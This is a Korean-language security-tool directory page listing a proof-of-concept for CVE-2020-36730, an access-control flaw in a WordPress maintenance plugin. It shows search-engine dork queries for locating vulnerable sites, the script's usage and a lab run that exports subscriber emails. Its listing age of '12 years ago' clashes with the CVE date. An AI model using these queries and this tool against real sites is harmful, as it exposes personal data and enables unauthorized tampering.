Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2020-36730 — CMP - Coming Soon & Maintenance < 3.8.2 - AJAX 호출에 대한 부적절한 접근 제어 (Subscriber+) | Kitploit
도구/GitHubGitHub/randomrobbiebf/cve-2020-36730
Vulnerability AnalysisExploitationWeb Application ExploitationInformation GatheringPenetration Testing
GitHubrandomrobbiebf/cve-2020-36730

CVE-2020-36730

CMP - Coming Soon & Maintenance < 3.8.2 - AJAX 호출에 대한 부적절한 접근 제어 (Subscriber+)

저장소 보기
12년 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2020-36730

CMP - Coming Soon & Maintenance < 3.8.2 - AJAX 호출에 대한 부적절한 접근 제어 (Subscriber+)

설명:

플러그인의 일부 AJAX 호출은 권한 및 CSRF 토큰을 제대로 확인하지 않아, 임의 게시물 읽기, 구독자 목록 내보내기, 플러그인 비활성화와 같은 문제가 발생할 수 있습니다.

root@kitploit:~
reference:
    - https://www.wordfence.com/threat-intel/vulnerabilities/id/f1ef067b-e4b4-4174-b6ff-ec94a7afd55d?source=api-prod
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
    cvss-score: 8.3
    cve-id: CVE-2020-36730
  metadata:
    fofa-query: "wp-content/plugins/cmp-coming-soon-maintenance/"
    google-query: inurl:"/wp-content/plugins/cmp-coming-soon-maintenance/"
    shodan-query: 'vuln:CVE-2020-36730'
root@kitploit:~


사용 방법
---

usage: CVE-2020-36730.py [-h] -u URL [-un USERNAME] [-p PASSWORD]

CMP - Coming Soon & Maintenance < 3.8.2 - Improper Access Controls on AJAX Calls (Subscriber+) Description: Some of the AJAX calls from the plugin do not properly check for capabilities and CSRF tokens, leading to issues such as arbitrary post read, subscribers list export and plugin deactivation. CVE-2020-36730

options: -h, --help show this help message and exit -u URL, --url URL Website URL -un USERNAME, --username USERNAME WordPress username -p PASSWORD, --password PASSWORD WordPress password

root@kitploit:~


POC
---

$ python3 CVE-2020-36730.py -u http://wordpress.lan -un user -p useruser1 The plugin version is below 3.8.2. The plugin version is 3.7.6 Vulnerability check: http://wordpress.lan Logged in successfully.

ID,Date,Email,Firstname,Lastname,Fullname 0,"2024-02-23 15:08:15",[email protected],,,

root@kitploit:~
도구 다운로드